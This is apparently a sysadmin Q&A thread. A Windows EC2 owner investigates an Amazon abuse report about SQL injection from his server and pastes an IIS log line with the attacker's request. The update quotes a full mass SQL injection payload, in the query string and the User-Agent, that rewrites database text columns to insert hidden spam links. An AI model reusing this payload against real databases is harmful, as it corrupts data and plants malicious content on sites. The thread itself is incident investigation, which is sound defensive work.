# Amazon EC2 Abuse Report - SQL Injection Attempts

Tags: windows-server-2008, security, amazon-ec2, iis

I have an EC2 server (Win2008) which has about 10 sites on it, it's completely locked down  apart from ports 80 and 443. I can only access port 3389 and 21 from my home and work IP addresses.

Just now I received the following from Amazon:

> We've received a report that your instance(s):
>
> Instance Id: i-XXXXXXX IP Address: XX.XXX.XXX.XXX
>
> has been making illegal intrusion attempts against remote hosts on the
>   Internet; check the information provided below by the abuse reporter.
>
> At 2015-Jun-21 06:52:07 (GMT +8), source IP XX.XXX.XXX.XXX has
>   attempted:
>   * SQL Injection Attempts

So I'm a little taken back by this. I have gone through all the sites and cannot see anything that would indicate a site has been compromised, or that anyone has compromised the server?

Could this be just a mistake or someone has masked their own IP address and used my servers? Any other ideas or tools that I could use to investigate this further to see if there has been a compromise?

Any help appreciated. Thanks.

---

Update

I have gone through ALL the IIS logs and there is the following

> WEBSITENAME\logs\W3SVC50\u_ex150620.log   1493    2015-06-20 19:22:27 10.120.9.175 GET /downloads-section.aspx d=9');declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''i%20dreamed%20my%20husband%20cheated%20on%20me%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''www.sharepointhelp.org''%2Bchar(47)%2B''pages''%2Bchar(47)%2B''page''%2Bchar(47)%2B''slug%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''why%20does%20husbands%20cheat''%20when%201%20then%20''website''%20else%20''redirect''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20how%20to%20cheat%20wife''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 80 - 78.129.243.85 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''i+dreamed+my+husband+cheated+on+me+''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''why+does+husbands+cheat''+when+1+then+''website''+else+''redirect''+end++''+how+to+cheat+wife''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- 200 0 0 15

However, it's trying to append to the querystring d=9 on that page. But I have double checked that code for that site, and if has a numeric check and cast. And if it fails that (Which it does for the above query), it just returns nothing - Which is what the site is doing, and that SQL would not have been executed.

So even more stumped now! Any other pointers appreciated.

Comment: Where is the rest of the abuse report?

Comment: *"completely locked down apart from ports 80 and 443"* ... does not say much at all about the odds of whether you've been breached or exploited.  It's quite difficult to spoof an IP address and successfully establish TCP connections, so the odds are not in your favor that this is a false report.  Have you *thoroughly* reviewed your web server logs from a time window surrounding the timestamp in the abuse report for anything unusual?

Comment: That's all the abuse report was apart from the Amazon waffle. I've gone through the IIS website logs as best I can by eye, using Notepad++. Is there a better way I can do this?

Comment: Use logparser lizard to query logs.

Comment: I have already parsed all the logs, see updated initial question.

Comment: This log shows a SQL injection attack made against you. But the IIS logs aren't going to show outgoing traffic, such as SQL injection attempts made by your server against others. Also the one logged has _two_ attacks; one in the query string and one in the User-Agent string. They appear designed for MySQL so it's unlikely that they were successful. BTW, @Michael-sqlbot little known fact: TCP SYN packets can carry a payload. So if you can squeeze your exploit into a single packet you can spoof an IP, but you still can't get the response.

Comment: Hi Michael - Thanks for your input. Appreciated. Any tools/tips on how to look for outgoing SQL inject in your traffic/network?